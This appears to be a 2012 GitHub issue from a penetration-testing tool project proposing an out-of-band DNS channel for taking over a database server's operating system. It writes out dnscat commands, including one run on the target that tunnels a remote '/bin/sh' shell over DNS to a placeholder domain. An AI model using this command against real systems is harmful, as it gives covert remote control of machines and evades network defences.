Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Out-of-band DNS channel for OS takeover #30

Open
bdamele opened this issue Jun 26, 2012 · 0 comments
Open

Out-of-band DNS channel for OS takeover #30

bdamele opened this issue Jun 26, 2012 · 0 comments

Comments

@bdamele
Copy link
Member

bdamele commented Jun 26, 2012

We have already got OOB database server takeover via TCP (using Metasploit payloads: shell, Meterpreter, VNC), via ICMP (using icmpsh). It is time to implement out-of-band via DNS.

DNS tunneling as a Metasploit shellcode: http://www.skullsecurity.org/blog/?p=611.
Details about dnscat: http://www.skullsecurity.org/wiki/index.php/Dnscat.

Example of string on the authoritative DNS server for tun.yourdomain.org:
sudo ./dnscat --listen

Example of string of the client (target system):
./dnscat --domain tun.yourdomain.org --exec "/bin/sh"

Type commands on the authoritative DNS server for tun.yourdomain.org where you launched dnscat, they will be executed on the client (target system) and standard output shown inline.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

1 participant